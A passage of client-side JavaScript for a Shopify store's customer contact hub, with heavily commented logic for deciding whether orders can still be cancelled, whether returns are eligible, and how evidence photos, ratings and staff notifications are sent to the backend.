   one — promising a cancel on an order that shipped 50 minutes after it was
   placed generates MORE email than an honest no.

   THREE STATES, NOT TWO. This used to be binary: a tracking number existed, so
   the answer was no. For THIS 3PL that is the mirror image of the same bug —
   too STRICT. They assign a tracking number to everything they are fulfilling
   that day, and told in time they can often still pull the parcel back off the
   pile. Refusing outright at that point refuses requests they would have
   honoured, and the customer who asked within an hour of ordering then emails
   to argue — manufacturing exactly the email volume this hub exists to remove.

     OPEN               nothing packed, no tracking      -> yes, we can almost
                                                            certainly stop this
     TRACKING_ASSIGNED  a number exists, no evidence the -> we will ask; we can
                        parcel moved, assigned recently     often still catch it
     DISPATCHED         it has demonstrably moved, or    -> no, it is genuinely
                        the assignment is old               on its way

   The honest signal separating the last two is the carrier's FIRST SCAN, which
   17TRACK has and Shopify does not. Until that API is wired we use a documented
   clock heuristic — CONFIG.fulfillment.interceptWindowHours, measured from the
   tracking-assignment timestamp — and order.trackingMovedAt overrides it the
   moment the backend can supply a real one.
   =========================================================================== */
/* Is this fulfillment order still stoppable?

   Three independent guards, each of which degrades safely if the field it needs
   was not requested:
     1. status must be OPEN (not CLOSED / IN_PROGRESS / ON_HOLD / CANCELLED);
     2. requestStatus must be UNSUBMITTED — once it has been submitted to the 3PL,
        "still open" no longer means "still stoppable";
     3. if supportedActions was requested, at least one action that means "this
        order has not been fulfilled yet" must be among them.
   supportedActions is checked LAST and only when present, because Shopify types
   it as [{action,externalUrl}] rather than [String] — reading it naively either
   threw, or silently matched nothing and refused every request on earth.

   GUARD 3 IS A SET, NOT ONE NAME. It used to require CREATE_FULFILLMENT, which
   Shopify only returns for a MERCHANT-MANAGED location. A fulfilment order
   assigned to a FULFILMENT-SERVICE location — the normal shape when a 3PL/ERP
   such as MabangErp3 pulls orders through the fulfilment-service API — comes
   back with REQUEST_FULFILLMENT (plus HOLD / MOVE / CANCEL_FULFILLMENT_ORDER)
   and no CREATE_FULFILLMENT at all. With the old single-name test openFOs was
   empty for EVERY such order, `partly` was false, and evaluate() fell through
   to UNCONFIRMED — which is not actionable. Every ordinary unfulfilled order
   would have been met with "we need to check this one by hand, email us",
   silently, and invisibly in the prototype (mocks 1-7 all hard-code
   CREATE_FULFILLMENT — mock 8, #LC12352, was added precisely so the dev bar
   exercises the fulfilment-service shape and this cannot regress unseen).
   The real signal is status + requestStatus, which guards
   1 and 2 already carry; this one only rejects a fulfilment order whose actions
   say it has already been fulfilled or closed.

   GUARD 2 IS A SET FOR THE SAME REASON. It used to demand
   requestStatus === "UNSUBMITTED", which re-created the identical silent
   refusal one field along: the FIRST thing a fulfilment-service integration
   does to a fulfilment order is move requestStatus off UNSUBMITTED. Shopify
   (or the merchant) sends the fulfilment request, requestStatus becomes
   SUBMITTED and then ACCEPTED, `status` stays OPEN and nothing has been packed
   — that is the STEADY STATE for a 3PL/ERP pulling orders through the
   fulfilment-service API, i.e. most of this client's orders for most of their
   life. Refusing those meant "we need to check this one by hand, email us" for
   an order still sitting untouched at the 3PL. ACCEPTED-but-unfulfilled means
   "they have it and have not packed it", which is precisely the case worth
   asking about. REJECTED, CLOSED and the CANCELLATION_* values still refuse:
   those describe a fulfilment order that is no longer live.
   Mock 8 hard-codes UNSUBMITTED, so it could not have shown this either —
   mock 9, #LC12353, carries requestStatus ACCEPTED (and a second fulfilment
   order in SUBMITTED) so the dev bar exercises this half too.

   TO CONFIRM WITH THE CLIENT BEFORE LAUNCH: (a) which integration mode
   MabangErp3 uses — either mode now works, but knowing it tells us which shape
   to expect; and (b) whether fulfilment requests are sent automatically at
   order creation, which decides whether a brand-new order arrives here as
   UNSUBMITTED or already SUBMITTED/ACCEPTED. */
function foSupportedActions(fo) {
  if (!Array.isArray(fo.supportedActions)) return null;      // not in the projection
  if (!fo.supportedActions.length) return [];
  return fo.supportedActions.map(function (a) {
    return typeof a === "string" ? a : (a && a.action) || "";
  });
}

/* Any ONE of these means "not fulfilled yet". CREATE_FULFILLMENT is the
   merchant-managed shape, REQUEST_FULFILLMENT the fulfilment-service shape;
   the rest are only ever offered on a fulfilment order that still has something
   in it — you cannot hold, move, split, merge or cancel a fulfilment order
   whose contents have already been shipped.

   THE LIST IS DELIBERATELY GENEROUS, because the two failure modes are not
   remotely symmetrical. A name missing from this list means a perfectly open
   order is refused with "we need to check this by hand" — silently, for every
   customer, which is the bug F1 documented. A name wrongly on it means at worst
   we offer to ask about a fulfilment order that Shopify has ALREADY told us is
   status OPEN and not yet fulfilled — guards 1 and 2, which is where
   the real signal lives. Shopify adds action names over time; an allow-list
   that has to be exhaustive to avoid a global outage is the wrong shape, so
   this one only has to catch the vocabulary that means "still stoppable", and
   guard 3 exists purely to reject a list that says the opposite (MARK_AS_OPEN /
   CLOSE on an already-fulfilled order). */
var FO_OPEN_ACTIONS = ["CREATE_FULFILLMENT", "REQUEST_FULFILLMENT",
                       "CANCEL_FULFILLMENT_ORDER", "HOLD", "MOVE",
                       "SPLIT", "MERGE"];

/* requestStatus values that still mean "nobody has packed this".
   UNSUBMITTED = no request sent (merchant-managed, or before the 3PL is asked).
   SUBMITTED   = request sent, 3PL has not answered yet.
   ACCEPTED    = the 3PL has taken it and has not fulfilled it.
   Everything else — REJECTED, CLOSED, CANCELLATION_REQUESTED,
   CANCELLATION_ACCEPTED, CANCELLATION_REJECTED — describes a fulfilment order
   that is no longer a live, stoppable piece of work, and is refused. */
var FO_OPEN_REQUEST_STATUSES = ["UNSUBMITTED", "SUBMITTED", "ACCEPTED"];

function foIsOpen(fo) {
  if (!fo || fo.status !== "OPEN") return false;
  if (fo.requestStatus &&
      FO_OPEN_REQUEST_STATUSES.indexOf(fo.requestStatus) === -1) return false;
  var acts = foSupportedActions(fo);
  if (acts === null) return true;                 // field not in the projection
  /* Present but empty is not evidence of anything either way — status OPEN +
     a live requestStatus is the real signal, so do not refuse on it. */
  if (!acts.length) return true;
  return acts.some(function (a) { return FO_OPEN_ACTIONS.indexOf(a) !== -1; });
}

/* When was a tracking number first put on this order?
   The EARLIEST assignment, deliberately: if one parcel was labelled three days
   ago and another an hour ago, the order as a whole is long gone, and letting
   the newer label restart the interception clock would promise a rescue for a
   parcel that is already in another country. Returns null when nothing carries
   a tracking number. */
function trackingAssignedAt(tracking) {
  var earliest = null;
  (tracking || []).forEach(function (t) {
    var ts = t && t.shippedAt ? new Date(t.shippedAt).getTime() : NaN;
    if (isNaN(ts)) return;
    if (earliest === null || ts < earliest) earliest = ts;
  });
  return earliest;
}

function evaluate(order) {
  var tracking  = trackingList(order);
  var cancelled = !!order.cancelledAt;
  var fos       = order.fulfillmentOrders || [];
  var openFOs   = fos.filter(foIsOpen);
  var onHold    = fos.some(function (fo) { return fo.status === "ON_HOLD"; });

  /* ANY fulfillment at all means something has been packed. The 3PL routinely
     creates the fulfillment before the carrier returns the YT number, so an
     empty trackingInfo does NOT mean nothing has left. */
  var fulfilments = order.fulfillments || [];
  var anyFulfilled = fulfilments.length > 0;
  var fstatus = order.displayFulfillmentStatus;
  /* PARTIALLY_FULFILLED / IN_PROGRESS are real values in Shopify's enum and
     were never handled: a half-shipped order was offered full cancellation. */
  var partly = anyFulfilled || (fstatus && fstatus !== "UNFULFILLED" &&
                                fstatus !== "UNSCHEDULED" && fstatus !== "SCHEDULED" &&
                                fstatus !== "ON_HOLD");

  /* ---- has the parcel actually MOVED? ------------------------------------
     THE UPGRADE PATH, and it is deliberately one line. order.trackingMovedAt is
     an optional ISO timestamp meaning "the carrier has scanned this parcel at
     least once". Shopify cannot tell us that; 17TRACK can. The backend adds the
     field, normaliseOrder() passes it straight through, and its mere presence
     forces DISPATCHED no matter what the clock says. Nothing else changes.
     Until then the field is simply absent and the heuristic below applies. */
  var moved = !!order.trackingMovedAt;

  var assignedAt   = trackingAssignedAt(tracking);
  var hoursSinceAssignment = assignedAt === null
    ? null : (nowMs(order) - assignedAt) / 3600000;
  /* Within the intercept window and no carrier movement -> still worth asking.
     A missing/unparseable assignment timestamp is treated as NOT interceptable:
     when we cannot tell how old the label is, the safe answer is the honest no,
     because a promise we then retract costs more than a refusal.

     CLAMPED AT BOTH ENDS. The upper bound was the only one, so a NEGATIVE age
     counted as interceptable — and the age is a SERVER timestamp measured
     against whatever clock the customer's device happens to have. A tablet with
     a dead RTC battery running two days slow made a parcel labelled 60 hours
     ago come out at 48h and get offered a live cancel/redirect form; a device
     two hours fast, or a 3PL server running ahead, produced -2.0h and the same
     result. A negative age means the two clocks disagree, which is not evidence
     the label is fresh — so it fails CLOSED to DISPATCHED. See nowMs(): once
     the Worker stamps `serverNow` on the response this is measured server clock
     against server clock and the skew disappears entirely. */
  var interceptable = !moved && hoursSinceAssignment !== null &&
                      hoursSinceAssignment >= 0 &&
                      hoursSinceAssignment <= CONFIG.fulfillment.interceptWindowHours;

  var state;
  if (cancelled)                     state = "CANCELLED";
  else if (onHold)                   state = "ON_HOLD";
  /* THE 17TRACK OVERRIDE, and it is unconditional by design. A carrier first
     scan means the parcel has physically left, full stop — so it must not be
     reachable only from inside the tracked branches. It used to be consulted
     only through `interceptable`, which is only read when a tracking NUMBER is
     also present, so an order the carrier had already scanned but whose number
     had not reached us yet (fulfilments truncated by first:10, a fulfilment
     created before trackingInfo came back, enrichment running ahead of Shopify
     propagation) fell through to OPEN — "your order is still sitting with our
     packing team", the strongest promise on the site, about a scanned parcel.
     The comment above says its mere presence forces DISPATCHED; now it does. */
  else if (moved)                    state = "DISPATCHED";
  /* THE SPLIT IS TESTED BEFORE THE TRACKED BRANCHES. A part-shipped order with
     a labelled parcel and a still-open fulfilment order is genuinely both
     things, and the tracked branches used to win — so the chip flipped to "On
     its way", the "coming in more than one parcel / nothing has been forgotten"
     card silently vanished, and the refusal claimed the whole order had been
     handed over while half of it was demonstrably still on the packing bench.
     The OUTCOME is identical either way (not actionable); only the wording
     changes, and this way it is true. */
  else if (partly && openFOs.length) state = "PARTIALLY_FULFILLED";
  /* A tracking number exists. Split it: recently assigned and unmoved is a
     request the packing team can often still honour; anything else has gone.
     `!openFOs.length` is now belt and braces — the split case is caught above —
     but it stays, because "we will ask about your order" is not a sentence we
     could honestly write about a half that is already labelled. */
  else if (tracking.length && interceptable && !openFOs.length) state = "TRACKING_ASSIGNED";
  else if (tracking.length)          state = "DISPATCHED";
  else if (partly)                   state = "FULFILLED_NO_TRACKING";
  else if (openFOs.length)           state = "OPEN";
  /* No open fulfillment order AND nothing fulfilled. Shopify does not always
     have fulfillment orders created the instant an order is placed, and the
     projection asks for only the first 10 — so treating "no open FO" as
     "already shipped" told brand-new unfulfilled customers their parcel had
     been handed to the courier. Trust displayFulfillmentStatus here. */
  else if (fstatus === "UNFULFILLED" || !fstatus) state = "UNCONFIRMED";
  else                               state = "CLOSED_NO_TRACKING";

  /* Two states let a customer put a request through, and they are NOT the same
     promise. OPEN is "we can almost certainly stop this". TRACKING_ASSIGNED is
     "we will ask, and we can often still catch it" — the forms, the Discord
     message and the Notion row are identical, the copy is not.
     UNCONFIRMED deliberately is NOT actionable — we do not know enough — but it
     routes to a human rather than to the returns flow. */
  var interceptOnly = (state === "TRACKING_ASSIGNED");
  var actionable    = (state === "OPEN") || interceptOnly;
  /* Anchored to nowMs(), like the label age above, so a skewed device cannot
     move an order in or out of the published policy window either. */
  var hrs = hoursSince(order.createdAt, order);
  var withinPolicy = hrs <= CONFIG.fulfillment.policyWindowHours;

  return {
    state: state,
    actionable: actionable,
    /* Copy switch. True only for TRACKING_ASSIGNED: every screen that offers an
       action reads this to decide between "we can" and "we will ask". */
    interceptOnly: interceptOnly,
    tracking: tracking,
    trackingAssignedAt: assignedAt === null ? null : new Date(assignedAt).toISOString(),
    hoursSinceTracking: hoursSinceAssignment,
    trackingMoved: moved,
    anyFulfilled: anyFulfilled,
    openFulfillmentOrders: openFOs.length,
    hoursSinceOrder: hrs,
    withinPolicyWindow: withinPolicy,
    /* True when the 12h rule and reality disagree — the case worth surfacing.
       Only meaningful for the states where "packed or not" is the question. */
    /* No `nextBatch` here. evaluate() is called five to ten times per render
       (order summary, plain status, every gate, every submit handler) and each
       nextDispatchUtc() builds up to fourteen Intl.DateTimeFormat instances for
       a value nothing read — startCountdown() owns the schedule and calls it
       itself. On the low-end Android devices this audience uses that was
       measurable work on every screen change, for nothing. */
    policyDisagrees: actionable !== withinPolicy
  };
}

/* ===========================================================================
   ██  RETURNS — THE CLIENT-SIDE MIRROR  ██
   ---------------------------------------------------------------------------
   Everything from here to evaluateReturn() is a deliberate MIRROR of
   worker/src/returns.js. Two copies of a rule is a smell, so it is worth being
   explicit about why this one exists and what it is allowed to decide.

   THE WORKER IS AUTHORITATIVE. IT DECIDES. THIS DOES NOT.
   The Worker re-reads the order from Shopify, re-verifies the email, and runs
   assessReturn() again on every submit. If these two ever disagree, the Worker
   wins and the customer is told at the point of submit. Nothing here can grant
   a return the Worker would refuse, and nothing here needs to be trusted.

   SO WHAT IS IT FOR? Not wasting the customer's time. Without it, someone
   whose order has not shipped yet fills in a reason, answers a severity
   question, photographs a product and types an explanation — and is then told
   at the last screen that a return is not the thing they want. The mirror
   catches that on the first screen, in one render, with no network call, and
   sends them to the flow that can actually help them.

   THE PRICE OF THE MIRROR IS DRIFT, and the way that gets caught is the
   contract test in worker/test/contract.test.js, which reads BOTH files and
   pins the reason ids, the severity ids and the window against each other. If
   you add a reason here, add it there; the suite goes red until you do.

   IT IS DELIBERATELY THE MORE GENEROUS OF THE TWO. Where this file is unsure
   — a delivery date it had to estimate, an order shape it does not recognise —
   it lets the customer through to the Worker rather than refusing them here.
   A hub that wrongly refuses a valid claim sends that person to the inbox,
   which is the exact volume this project exists to remove.
   ===========================================================================*/

/* The reason taxonomy. `notion` is not used by the browser and is carried only
   so the internal preview can show the row that will be created — see
   CONFIG.debug.showInternalPreviews. */
/* `seelFirst` IS PART OF THE MIRROR, not a separate map. It is the field
   seelRoutes() reads, and it is copied from worker/src/returns.js field for
   field like the rest of this table. Do not add a second copy of it anywhere. */
var RETURN_REASONS = {
  "damaged-in-transit": { id:"damaged-in-transit", notion:"Damaged in transit",
                          evidence:true,  threePL:true,  severity:true,  fault:true,  seelFirst:true  },
  "faulty":             { id:"faulty",             notion:"Faulty",
                          evidence:true,  threePL:true,  severity:true,  fault:true,  seelFirst:true  },
  "wrong-item":         { id:"wrong-item",         notion:"Wrong item sent",
                          evidence:true,  threePL:true,  severity:false, fault:true,  seelFirst:false },
  "not-as-described":   { id:"not-as-described",   notion:"Not as described",
                          evidence:true,  threePL:false, severity:false, fault:false, seelFirst:false },
  "changed-mind":       { id:"changed-mind",       notion:"Changed mind",
                          evidence:false, threePL:false, severity:false, fault:false, seelFirst:false },
  "never-arrived":      { id:"never-arrived",      notion:"Never arrived",
                          evidence:false, threePL:true,  severity:false, fault:true,  seelFirst:true  },
  "spelling-wrong":     { id:"spelling-wrong",     notion:"Spelling wrong",
                          evidence:true,  threePL:true,  severity:false, fault:true,  seelFirst:false }
};

/* THE ORDER OF THIS LIST IS THE ORDER ON SCREEN, and it is not alphabetical.
   The first three are what people actually arrive with, commonest first;
   "changed my mind" sits below them because putting it at the top invites it,
   and it is the one outcome with no good answer for either side. */
var RETURN_REASON_ORDER = [
  "damaged-in-transit", "faulty", "wrong-item",
  "never-arrived", "not-as-described", "changed-mind"
];

/* Severity — the question that decides who pays. The 3PL credits the landed
   cost back only where the item is genuinely unusable, so this one tap is the
   difference between a claim that costs the store nothing and one it absorbs
   in full. The customer is never shown any of that; they are asked whether
   they can still use the thing, which is a question they can answer. */
var RETURN_SEVERITY = {
  "cosmetic": { id:"cosmetic", pct:0.20 },
  "impaired": { id:"impaired", pct:0.30 },
  "unusable": { id:"unusable", pct:0.50 }
};
var RETURN_SEVERITY_ORDER = ["cosmetic", "impaired", "unusable"];

/* Own-property checked, like every lookup in this file that a URL, a saved
   draft or a stale render can reach: RETURN_REASONS.toString is a truthy
   function with no `id`. */
function returnReason(id) {
  var key = String(id == null ? "" : id).trim().toLowerCase();
  return lcHasOwn(RETURN_REASONS, key) ? RETURN_REASONS[key] : null;
}
function returnSeverity(id) {
  var key = String(id == null ? "" : id).trim().toLowerCase();
  return lcHasOwn(RETURN_SEVERITY, key) ? RETURN_SEVERITY[key] : null;
}

var RETURN_WINDOW_DAYS = 30;
var UK_STATUTORY_DAYS = 14;
var RETURN_DAY_MS = 86400000;
/* Observed on this store: first carrier scan two to three days after the
   ~02:50Z fulfilment batch, delivered six to fourteen days after that. Rounded
   up, and generous on purpose — it is only ever used to decide whether someone
   is INSIDE a window, so over-estimating transit moves the deadline later and
   can only grant a return, never refuse one. */
var RETURN_TRANSIT_DAYS = 14;
var RETURN_DISPATCH_LAG_DAYS = 3;

var RETURN_MARKETS = { US:"US", GB:"UK", AU:"AU", NZ:"NZ" };

function returnMarket(order) {
  var a = order && order.shippingAddress;
  var code = String((a && a.countryCodeV2) || "").trim().toUpperCase();
  return lcHasOwn(RETURN_MARKETS, code) ? RETURN_MARKETS[code] : "OTHER";
}

/* When did it land? The same four-rung ladder the Worker walks, and it records
   HOW it knew, because a window computed from an estimate must never be shown
   to a customer as a fact. `certain` is true only for a carrier-confirmed
   delivery. */
function returnDeliveryOf(order, now) {
  var fs = (order && order.fulfillments) || [];
  if (!fs.length) return { at:null, basis:null, certain:false };

  var ms = function (v) {
    var t2 = new Date(String(v || "")).getTime();
    return isFinite(t2) ? t2 : null;
  };

  /* LATEST across parcels, not earliest. A part-shipped order is delivered
     when the LAST parcel arrives; starting the clock at the first would
     shorten the window for exactly the customers whose order we split. */
  var delivered = null, moved = null, created = null, flagged = false;
  for (var i = 0; i < fs.length; i++) {
    var f = fs[i];
    if (String((f && f.displayStatus) || "").toUpperCase() === "DELIVERED") flagged = true;
    var d = ms(f && f.deliveredAt);
    if (d !== null) delivered = delivered === null ? d : Math.max(delivered, d);
    var tr = ms(f && f.inTransitAt);
    if (tr !== null) moved = moved === null ? tr : Math.max(moved, tr);
    var c = ms(f && f.createdAt);
    if (c !== null) created = created === null ? c : Math.max(created, c);
  }

  if (delivered !== null) return { at:delivered, basis:"carrier", certain:true };
  if (moved !== null) {
    return { at: moved + RETURN_TRANSIT_DAYS * RETURN_DAY_MS,
             basis: flagged ? "estimated-delivered" : "estimated-transit", certain:false };
  }
  if (created !== null) {
    return { at: created + (RETURN_DISPATCH_LAG_DAYS + RETURN_TRANSIT_DAYS) * RETURN_DAY_MS,
             basis: flagged ? "estimated-delivered" : "estimated", certain:false };
  }
  return { at:null, basis:null, certain:false };
}

/* States, and each is a different screen:
     NOT_SENT       nothing has shipped — this customer wants cancel or amend,
                    both of which are still open to them. Say so.
     CANCELLED      nothing to return.
     IN_TRANSIT     gone but not landed. "It never arrived" is legitimate here;
                    you cannot report damage on a parcel you have not opened.
     DELIVERED      the normal case.
     WINDOW_CLOSED  delivered, past 30 days. NOT a refusal — durability rights
                    are not bounded by a returns window — so this routes to a
                    person rather than to a dead end.
     UNKNOWN        no order. */
function evaluateReturn(order, reasonId, severityId) {
  var reason = returnReason(reasonId);
  var severity = returnSeverity(severityId);
  var market = returnMarket(order);
  var now = nowMs(order);

  var base = {
    returnable:false, state:"UNKNOWN", reason: reason ? reason.id : null,
    severity: severity ? severity.id : null,
    market: market, windowDays: RETURN_WINDOW_DAYS,
    delivery: { at:null, basis:null, certain:false },
    daysSinceDelivery:null, withinWindow:false, withinUkStatutory:false,
    personalised:false,
    needsEvidence: !!(reason && reason.evidence),
    needsSeverity: !!(reason && reason.severity),
    notifyThreePL: !!(reason && reason.threePL),
    declined:false, declineCode:null
  };

  if (!order) return base;
  if (order.cancelledAt) { base.state = "CANCELLED"; return base; }

  var personalised = personalisedItems(order).length > 0;
  var delivery = returnDeliveryOf(order, now);
  base.personalised = personalised;
  base.delivery = delivery;

  if (delivery.at === null) { base.state = "NOT_SENT"; return base; }

  if (delivery.at > now) {
    base.state = "IN_TRANSIT";
    base.returnable = !!(reason && reason.id === "never-arrived");
    return base;
  }

  var days = Math.floor((now - delivery.at) / RETURN_DAY_MS);
  base.daysSinceDelivery = days;
  base.withinWindow = days <= RETURN_WINDOW_DAYS;
  base.withinUkStatutory = market === "UK" && days <= UK_STATUTORY_DAYS;
  base.state = base.withinWindow ? "DELIVERED" : "WINDOW_CLOSED";

  /* The one outright refusal this file makes on its own: a named, hand-knitted
     backpack cannot be resold, and personalised goods are carved out of the UK
     statutory cancellation right. Faults on the same item stay fully covered,
     which is why this is keyed on the reason and not on the item alone. */
  if (personalised && reason && reason.id === "changed-mind") {
    base.declined = true;
    base.declineCode = "personalised_change_of_mind";
    return base;
  }

  /* A reason that needs a severity and has not been given one is INCOMPLETE,
     not refused — the flow asks the question and comes back. */
  var severityAnswered = !reason || !reason.severity || !!severity;
  base.returnable = base.withinWindow && !!reason && severityAnswered;
  return base;
}

/* ===========================================================================
   ██  BACKEND CALL — UPLOAD ONE PHOTO  ██
   ---------------------------------------------------------------------------
   ONE FILE PER REQUEST. Five 10MB parts in one body is a 50MB upload that
   fails as a unit: the parent on hotel wifi who gets four through and loses
   the fifth is asked to start again. One per request buys per-shot progress, a
   retry that costs one photo, and a body the Worker can bound before reading.

   THE TICKET IS WHAT MAKES THIS POSSIBLE AT ALL. The upload happens before
   submit, so the Worker cannot re-check the customer's email against the order
   the way every other write path does — there is no order on the request yet.
   The lookup response carries a short-lived signed ticket instead, and it is
   the only thing standing between this endpoint and an open write. Without one
   in State, do not even try: a refusal from the Worker and a refusal from here
   look identical to the customer, and the second costs no round trip.

   NEVER THROWS. Every failure resolves to { ok:false, reason } so the caller
   can put the message under the right thumbnail and leave the other four
   uploads alone.
   ===========================================================================*/
/* THE CUSTOMER TAKES ONE OF THE OFFERS.

   Sends an OFFER ID and nothing about money. The Worker priced the set when it
   was created and reads the amount back from its own store — a price sent from
   here would be ignored, and sending one would only invite somebody to try. */
function chooseResolution(offerId) {
  var r = State.result || {};
  if (!r.requestId || !r.resolutionTicket || !offerId) {
    return Promise.resolve({ ok:false });
  }
  var ac = ("AbortController" in window) ? new AbortController() : null;
  var timer = ac ? setTimeout(function () { try { ac.abort(); } catch (e) {} }, 20000) : null;
  var done = function (out) { if (timer) clearTimeout(timer); return out; };

  return fetch(CONFIG.api.chooseUrl, {
    method: "POST",
    credentials: "same-origin",
    headers: { "content-type": "application/json" },
    body: JSON.stringify({
      requestId: r.requestId,
      offerId: offerId,
      ticket: r.resolutionTicket
    }),
    signal: ac ? ac.signal : undefined
  }).then(function (res) {
    return res.json().catch(function () { return { ok:false }; });
  }).then(done, function () { return done({ ok:false }); });
}

/* ===========================================================================
   THE HUB RATING

   INTERNAL. There is no review link on this path and there must not be one —
   see the header of worker/src/rating.js.

   Fire-and-forget by design. The Worker answers `{ok:true}` whether or not the
   rating actually landed, because every way it can fail is our problem and not
   something the customer can act on. So there is no error state here either:
   the widget thanks them and moves on. A "your feedback could not be saved"
   message would sour a flow that just went well, in exchange for nothing.
   =========================================================================== */
function submitRating(stage, score, comment) {
  var r = State.result || {};
  if (!r.requestId || !r.ratingTicket) return Promise.resolve({ ok:false });

  var ac = ("AbortController" in window) ? new AbortController() : null;
  var timer = ac ? setTimeout(function () { try { ac.abort(); } catch (e) {} }, 15000) : null;
  var done = function (out) { if (timer) clearTimeout(timer); return out; };

  return fetch(CONFIG.api.rateUrl, {
    method: "POST",
    credentials: "same-origin",
    headers: { "content-type": "application/json" },
    body: JSON.stringify({
      requestId: r.requestId,
      stage: stage,
      score: score,
      comment: comment || "",
      ticket: r.ratingTicket
    }),
    signal: ac ? ac.signal : undefined
  }).then(function (res) {
    return res.json().catch(function () { return { ok:false }; });
  }).then(done, function () { return done({ ok:false }); });
}

/* The stars. Real <button>s rather than a radio group or a row of spans: they
   are one tap on a phone, they are reachable by keyboard for free, and each one
   carries its own label so a screen reader reads "3 out of 5" and not "star". */
function ratingCard() {
  var r = State.result || {};
  /* No ticket means the Worker did not offer one — an older submission, a KV
     miss, or a deploy where the route is not live yet. Render nothing rather
     than a widget whose every tap would be dropped. */
  if (!r.requestId || !r.ratingTicket) return "";
  if (!shown("hubRating")) return "";

  var stars = "";
  for (var i = 1; i <= 5; i++) {
    stars += '<button type="button" class="lc-rate__star" data-rate="' + i + '" ' +
      'aria-label="' + esc(t("rate.star", { n: i })) + '">' +
      '<span aria-hidden="true">\u2605</span></button>';
  }

  return '<section class="lc-card lc-rate" data-rate-card>' +
      '<h2 style="font-size:calc(0.94117647em * var(--lc-heading-scale));margin-bottom:6px">' +
        esc(t("rate.heading")) + '</h2>' +
      '<p class="lc-step-note" style="margin-top:0">' + esc(t("rate.intro")) + '</p>' +
      '<div class="lc-rate__stars" role="group" aria-label="' + esc(t("rate.heading")) + '">' +
        stars +
      '</div>' +
      '<div class="lc-rate__scale">' +
        '<span>' + esc(t("rate.low")) + '</span>' +
        '<span>' + esc(t("rate.high")) + '</span>' +
      '</div>' +
    '</section>';
}

function uploadEvidence(file, shot) {
  var order = State.order || {};
  if (!State.evidenceTicket) return Promise.resolve({ ok:false, reason:"no_ticket" });
  if (!file) return Promise.resolve({ ok:false, reason:"no_file" });
  if (file.size > EVIDENCE_MAX_BYTES) return Promise.resolve({ ok:false, reason:"too_large" });

  var fd = new FormData();
  fd.append("orderId", order.id || "");
  fd.append("ticket", State.evidenceTicket);
  fd.append("shot", shot);
  fd.append("file", file, file.name || "photo.jpg");

  var ac = ("AbortController" in window) ? new AbortController() : null;
  /* Longer than the submit deadline: this is several megabytes off a phone
     camera, over the connection that phone happens to have. */
  var timer = ac ? setTimeout(function () { try { ac.abort(); } catch (e) {} }, 60000) : null;
  var done = function (out) { if (timer) clearTimeout(timer); return out; };

  return fetch(CONFIG.api.evidenceUrl, {
    method: "POST",
    credentials: "same-origin",
    /* NO content-type header. The browser sets multipart/form-data WITH the
       boundary it generated; setting it by hand omits the boundary and the
       Worker cannot parse a single part. */
    body: fd,
    signal: ac ? ac.signal : undefined
  }).then(function (res) {
    if (!res.ok) return done({ ok:false, reason:"network" });
    return res.json().then(function (data) {
      if (!data || data.ok !== true || !data.key) {
        return done({ ok:false, reason: (data && data.reason) || "failed" });
      }
      return done({ ok:true, key:data.key, shot:data.shot, kind:data.kind, size:data.size });
    }, function () { return done({ ok:false, reason:"network" }); });
  }).catch(function () {
    return done({ ok:false, reason:"network" });
  });
}

/* Kept in step with MAX_BYTES in worker/src/evidence.js. The browser check is
   a courtesy — it saves a parent on a slow connection from uploading 40MB of
   4K video to be told no — and the Worker enforces the real one. */
var EVIDENCE_MAX_BYTES = 10 * 1024 * 1024;

/* The guided shot list. NOT a generic file field: "upload a photo" from
   somebody holding a phone in one hand produces one blurry close-up of a
   corner and nothing that settles a claim. Three named shots, asked for
   separately, each with its own thumbnail slot.

   `label` is what the packing team sees beside the attachment in Discord, so
   it describes the shot's PURPOSE rather than naming a file. */
var EVIDENCE_SHOTS = [
  { id:"problem", required:true },
  { id:"item",    required:true },
  /* THE ONE THAT ACTUALLY DETERS FRAUD, and the reason the policy forbids
     auto-approval without it. A photo of a broken toy can be found on the
     internet; a photo of THIS order's shipping label on THIS order's bag
     cannot. */
  { id:"label",   required:true },
  { id:"extra",   required:false }
];

/* Tracking display state, kept separate from action eligibility — but DERIVED
   from evaluate() so the two cannot drift apart again.

   LABELLED_NOT_MOVED is the display face of TRACKING_ASSIGNED. Without it this
   function returned "TRACKABLE" the instant any number existed, and the status
   screen served the full "Your parcel / Track my parcel" card with the line
   "it shows every scan as your parcel moves" — a sentence that is false BY
   DEFINITION in this state (the label exists precisely because nothing has been
   scanned), 40px above a panel correctly saying "Not yet — it has not been
   collected". Sending that customer to the tracking page gets them "no
   information found", which is the exact failure the hub exists to remove. */
function trackingState(order) {
  var t = trackingList(order);
  if (t.length) {
    return evaluate(order).interceptOnly ? "LABELLED_NOT_MOVED" : "TRACKABLE";
  }
  /* Same bug as evaluate(): testing only for FULFILLED told a partially
     shipped customer "there is no tracking number yet — that is completely
     normal" about a parcel that was already in transit. */
  if ((order.fulfillments || []).length) return "FULFILLED_NO_TRACKING";
  var f = order.displayFulfillmentStatus;
  if (f && f !== "UNFULFILLED" && f !== "UNSCHEDULED" && f !== "SCHEDULED" && f !== "ON_HOLD") {
    return "FULFILLED_NO_TRACKING";
  }
  return "AWAITING_DISPATCH";
}

/* ------------------------------------------------------------------------ */

/* ===========================================================================
   MESSAGE BUILDERS — Discord + Notion previews.
   =========================================================================== */
/* MOCK-PATH ONLY, AND UNREACHABLE IN THE THEME BUILD. Every live request id
   now comes back from the Worker (see submitRequest) and that one is
   authoritative: it is the id in the packing team's message and on the CS
   board, so a locally-minted id would leave a customer quoting a reference no
   member of staff can find. Kept here so this file and contact-hub.html — where
   the mock still calls it — stay line-for-line comparable. */
function requestId() {
  return "LC-REQ-" + String(Math.floor(Math.random() * 9000) + 1000);
}

/* order.customerName is set by normaliseOrder() from customer.firstName/
   lastName, falling back to shippingAddress.name and then to the name the
   customer typed. Shopify has no `customerName` field, so reading one straight
   off the order — as this used to — produced "Customer: undefined" in every
   3PL message and "Cancellation Request - undefined" as every Notion title. */
function orderCustomerName(order) {
  return (order && order.customerName) ? order.customerName : deriveCustomerName(order || {});
}

function buildDiscordContext(order, extra) {
  var el = evaluate(order);
  var head = headlineItem(order);
  return Object.assign({
    order:    order.name,
    tracking: el.tracking.length ? el.tracking.map(function (t) { return t.number; }).join(", ")
                                 : "not yet assigned",
    name:     orderCustomerName(order),
    qty:      head ? head.quantity : 0,
    product:  head ? itemLabel(head) : "—",
    total:    Number(order.totalPriceSet.shopMoney.amount).toFixed(2),
    date:     fmtShopDate(order.createdAt),
    placed:   fmtPlacedPhrase(order.createdAt),

    /* How long after placing the order the customer actually asked. The
       client's cancellation template hard-codes "immediately after placing
       order"; that is true of the OPEN case it was written for and false of a
